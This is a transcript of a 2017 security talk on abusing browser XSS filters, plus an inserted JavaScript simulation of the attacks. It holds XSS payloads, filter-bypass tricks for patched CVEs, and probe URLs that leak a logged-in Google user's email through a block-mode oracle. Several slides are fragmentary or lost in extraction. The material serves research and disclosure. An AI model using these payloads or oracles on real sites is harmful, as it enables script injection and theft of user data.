
USAGE OF XSS FILTER


English version of my presentation at Shibuya.XSS techtalk #9.
The Japanese version is here: https://speakerdeck.com/masatokinugawa/shibuya-dot-xss-techtalk-number-9

Masato Kinugawa

April 25, 2017

Transcript






  3. Agenda

  5. XSS Filter?
    https://example.com/?q=">

    ">

  7. Support
    https://addons.mozilla.org/ja/firefox/addon/noscript/


  8. How to Control
    HTTP/1.1 200 OK
    Date: Tue, 28 Mar 2017 06:16:00 GMT
    Expires: -1
    Cache-Control: private, max-age=0
    Content-Type: text/html; charset=UTF-8
    Server: gws
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN


  9. X-XSS-Protection

  11. How to control NoScript
    X-XSS-Protection

  12. Basic Behavior
    https://example.com/?q=">
    https://example.com/#5382863726995448701


    ">
    ">


  13. Behavior of block mode


  14. Filter Mechanism of IE/Edge
    ">


    https://example.com/?q=">


  15. Filter Mechanism of XSS Auditor
    ">


    https://example.com/?q=">


  16. Filter Mechanism of NoScript
    https://example.com/?q=">
    https://example.com/#5382863726995448701



  17. False Positives and Filter
    <script> - Google Search
    (function(){window.google={kEI: [...]
    https://www.google.co.jp/search?q=<script>

  18. Filter's Risk
    if(jQuery){
    // Expected
    }else{
    // ???
    }
    https://example.com/?

  19. Abusing Filter's Replacement Mode

  20. Filter Regex of IE/Edge
    {{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}}
    [...]
    {(v|(?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(?0*((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(?0*((83)|(53)|(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(?0*((67)|(43)|(99)|(63));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(?0*((82)|(52)|(114)|(72));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(t|(?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).}
    {{}
    {{[...]
    {{[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.}
    {[...]
    ">

  21. Why "> happens
    [ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.
    ">


  22. Why "> happens
    ">
    [\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}
    x="";alert(1)//"

  23. XSS using XSS filter means:


  24. Past Discoveries
    https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf
    http://d.hatena.ne.jp/teracc/20090622

  25. 2015: Rediscoveries
    https://www.slideshare.net/masatokinugawa/xxn-en


  26. XXN Example
    [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?[.].+?=
    q = "";document#body.innerHTML="<xss>";
    URL: ?q=";document.body.innerHTML="

  27. XXN Example
    [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?[.].+?=
    <script src="//example.co.jp/test.js"
    type="text/javascript">
    URL: ?"/++.+++=

  28. Mitigation for these attacks
    mode=block
    "style=:\
    javascript:-
    vbscript:-
    vbs:-
    ",x[]=
    "{toString:
    "{valueOf:
    mode=block


  29. Strange fix
    type="text/javascript">


  30. ^ is Safe?
    window#name// The execution is aborted by the syntax error
    window^name// valid syntax, it is executed as JavaScript
    window.name

  32. XXN using caret
    (CVE-2016-3212)
    url=location.search.slice(1);
    if(url^indexOf(":")!=-1){
    url=null;
    }
    onload=function(){
    if(url){location=url;}
    }


  33. ES6 and XXN
    https://example.com/?q=";alert`1`//

    q = "";alert`1`//";
    https://www.slideshare.net/x00mario/es6-en/34
    ECMAScript 6 from an Attacker's Perspective
    - Breaking Frameworks, Sandboxes, and everything else (by Mario Heiderich)

  34. XXN using back-tick characters
    (CVE-2016-7280)
    https://example.com/?q=${alert(1)}``//&`+++`

    https://example.com/?q=[USER_INPUT]

    foo=``;
    q="[USER_INPUT]";

    foo=`#;
    q="${alert(1)}#`//";

  35. Now, the replacement behavior is safe?
    https://example.com/?+onfiles+++=.

    type="text/javascript">

    [...]


  36. Future replacement mode
    https://bugs.chromium.org/p/chromium/issues/detail?id=654794


  37. Abusing Filter's Block Mode

  38. Past found bugs in block mode
    http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html
    window.length


  39. Getting the filter state
    https://VICTIM/
    https://VICTIM/?

    IFRAME ERROR
    https://ATTACKER/

    win = window.open(…);
    if (win.length == 0) {
      // when the filter works, the number of frames is "0"
    } else {
      // normal
    }
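The two abuses above, XXN in replacement mode (slides 26-32) and the frame-count oracle in block mode (slides 38-39), can be reproduced offline with the following added example. It is not code from the deck and not the IE/Edge filter's code; it is a deliberately simplified model written for this page. Assumptions, all mine: the signature is matched against the raw request query; the text it matched is then looked up verbatim in the response (the real filter normalises whitespace, encodings and case, which is not modelled); in replacement mode the character marked with {..} in the signature is overwritten with '#'; in block mode the whole response is replaced by an empty document. The signature, the page template `q = "[USER_INPUT]";`, the attack input, the `window#name`/`window^name` pair and the caret-neutered snippet from slide 32 are from the slides; the helper names, the address alice@example.org, the candidate list and the iframe in the simulated victim page are constructed.

```javascript
// Added example (not from the deck): simplified model of a signature-based
// reflective XSS filter, used to show the XXN effect and the block-mode
// oracle. All helper names and sample data below are constructed.

// Signature from slide 26. {..} marks the character the filter overwrites.
const XXN_SIGNATURE = '["\'][ ]*(([^a-z0-9~_:\'" ])|(in)).+?{[.]}.+?=';

// Rewrite "before{neuter}after" as /(before)(neuter)(after)/ so the offset of
// the character to overwrite is simply match.index + match[1].length.
function compileSignature(sig) {
  const m = /^(.*)\{(.+?)\}(.*)$/.exec(sig);
  if (!m) throw new Error('signature has no {..} marker');
  return new RegExp('(' + m[1] + ')(' + m[2] + ')(' + m[3] + ')', 'i');
}

// Run the filter over one request/response pair (assumption: verbatim lookup).
//   mode 'replace': overwrite the marked character  (X-XSS-Protection: 1)
//   mode 'block'  : serve an empty page              (X-XSS-Protection: 1; mode=block)
function applyFilter(requestQuery, responseBody, mode) {
  const m = compileSignature(XXN_SIGNATURE).exec(requestQuery);
  if (!m) return { blocked: false, body: responseBody };        // request looks benign
  const at = responseBody.indexOf(m[0]);
  if (at === -1) return { blocked: false, body: responseBody }; // matched text not in the page
  if (mode === 'block') return { blocked: true, body: '' };
  const pos = at + m[1].length;                                 // the {..} character
  return { blocked: false,
           body: responseBody.slice(0, pos) + '#' + responseBody.slice(pos + 1) };
}

// --- XXN in replacement mode (slide 26) ------------------------------------
// Page template `q = "[USER_INPUT]";` and the input from the slide's URL.
const renderReflectingPage = (input) => 'q = "' + input + '";';
const XXN_INPUT = '";document.body.innerHTML="';

// Does a script still parse after the filter touched it? '#' breaks the
// statement; '^' is the XOR operator, so the rewritten code stays valid
// JavaScript (slide 30) and runs (slide 32). new Function() only parses.
function parsesAsJavaScript(src) {
  try { new Function(src); return true; } catch (e) { return false; }
}
// Neutered code from slide 32 (CVE-2016-3212): the '.' became '^'.
const CARET_XXN = 'url=location.search.slice(1);\n' +
                  'if(url^indexOf(":")!=-1){url=null;}\n' +
                  'onload=function(){if(url){location=url;}}';

// --- block mode as an oracle (slides 38-39) --------------------------------
// The simulated victim page does NOT reflect the query; it only embeds the
// logged-in user's address (constructed) and one iframe. The filter still
// fires when a string from the attacker's URL happens to occur in the page,
// and a blocked page has zero frames, readable cross-origin via win.length.
const SECRET_EMAIL = 'alice@example.org';
const VICTIM_PAGE =
  '<script>cfg = {"id":"42","mail":"' + SECRET_EMAIL + '"};v.x=1;</script>\n' +
  '<iframe src="/frame"></iframe>';

const countFrames = (html) => (html.match(/<iframe\b/gi) || []).length;

// Stand-in for window.open(): returns an object with the `length` a real
// Window object would report once the victim page has loaded.
function openSimulatedVictim(url) {
  const r = applyFilter(url.slice(1), VICTIM_PAGE, 'block');   // drop the leading '?'
  return { length: r.blocked ? 0 : countFrames(r.body) };
}

// A probe that satisfies the signature (quote, non-alphanumeric, a '.', then
// '=') and occurs in the page only if `candidate` is the embedded address.
const probeFor = (candidate) => '","mail":"' + candidate + '"};v.x=';

// The deck recovers the address one character at a time (slides 47-57) using
// the filter's matching rules; under this verbatim-match model each probe can
// only test a whole candidate value, but the oracle itself is the same.
function findLoggedInUser(candidates, openVictim = openSimulatedVictim) {
  for (const c of candidates) {
    if (openVictim('?' + probeFor(c)).length === 0) return c; // filter fired: blank page
  }
  return null;
}

const CANDIDATES = ['bob@example.org', 'alice@example.org', 'carol@example.org'];
console.log(applyFilter('q=' + XXN_INPUT, renderReflectingPage(XXN_INPUT), 'replace').body);
console.log(findLoggedInUser(CANDIDATES));
```

In a browser the attacker page would call `window.open()` on the victim URL and read `win.length` after load; `openSimulatedVictim` only replaces that call so the example runs without a browser. The replacement-mode run prints `q = "";document#body.innerHTML="";`, which no longer parses, which is exactly why the later switch to `^` mattered: `CARET_XXN` parses and runs.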

  40. Mitigations in IE/Edge

  41. Abusing block mode in Google
    https://www.youtube.com/watch?v=IMDWjKFbsJE


  42. Checking Google's Homepage
    HTTP/1.1 200 OK
    [...]
    Server: gws
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN


    window.length


  43. Special Conditions(1)
    https://accounts.google.com/ServiceLogin?


  44. Special Conditions(2)
    google.ae
    google.as
    google.ca
    google.co
    google.co.in
    google.co.jp
    google.co.kr
    google.co.nz
    google.co.uk
    google.com.br
    google.com.mx
    google.de
    google.es
    google.fr
    google.it
    google.pl
    google.pt
    google.ru
    ...


  45. Bypassing attempts limitation

  46. Another important thing
    {


  47. Investigating filter details
    (chart with a 0-10 scale; data not recoverable)
    https://example.com/

  48. Investigating filter details
    (chart with a 0-10 scale; data not recoverable)
    https://example.com/?

  49. Investigating filter details
    (chart with a 0-10 scale; data not recoverable)
    https://example.com/?

  50. Result
    0x01-08 0x0E-1F
    !"$%'()*;=^`|~
    0x09-0D 0x20 +
    &
    >
    #,/:?[\]{}
    -.@_
    A a
    0x00
    0-9 <
    B-Z b-z
    No reaction

  52. The Target
    [email protected]
    {[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}


  53. Check Conditions

  54. Organizing URL for attacks
    [email protected]


  55. Getting the number of characters
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=


  56. Getting the characters
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=


  57. Getting the characters
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ca/?"[email protected]=
    ...

  59. After the fix


  60. Microsoft's Fix


  61. Proper Usage of XSS Filter

  62. Recommendation of X-XSS-Protection

  63. 0 is dangerous?

  64. What should we do?
    X-XSS-Protection

  65. Finally: Rewards
